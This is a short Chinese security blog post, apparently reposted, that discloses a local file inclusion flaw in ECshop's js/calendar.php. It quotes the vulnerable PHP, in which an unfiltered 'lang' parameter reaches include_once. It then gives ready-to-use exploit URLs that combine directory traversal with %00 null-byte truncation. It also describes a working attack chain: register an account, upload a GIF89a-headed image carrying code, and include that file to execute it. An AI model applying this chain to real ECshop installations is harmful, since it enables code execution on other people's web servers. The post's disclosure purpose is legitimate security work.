您的位置 » 首页 » 实用工具 » ECshop本地包含漏洞

ECshop本地包含漏洞

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年07月13日 | 文章热度:10,545 次 全屏阅读

显示不全请点击全屏阅读

js/calendar.php $lang = (!empty($_GET[‘lang’])) ? trim($_GET[‘lang’]) : ‘zh_cn’;//没有过滤,很明显的包含漏洞 if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’)) { $lang = ‘zh_cn’; } require(dirname(dirname(__FILE__)) . ‘/data/config.php’); header(‘Content-type: application/x-javascript; charset=’ . EC_CHARSET); include_once(‘../languages/’ . $lang . ‘/calendar.php’);//这里包含,需要截断 测试代码 : // 需要 magic_quotes_gpc = Off /js/calendar.php?lang=../index.php%00.(注意后面有个.) 利用方法: 先注册用户 然后上传GIF89a头的GIF文件欺骗, 然后包含 代码:http://localhost/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00.

转自: Lynn’s blog

Tags:

ECshop漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/518/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)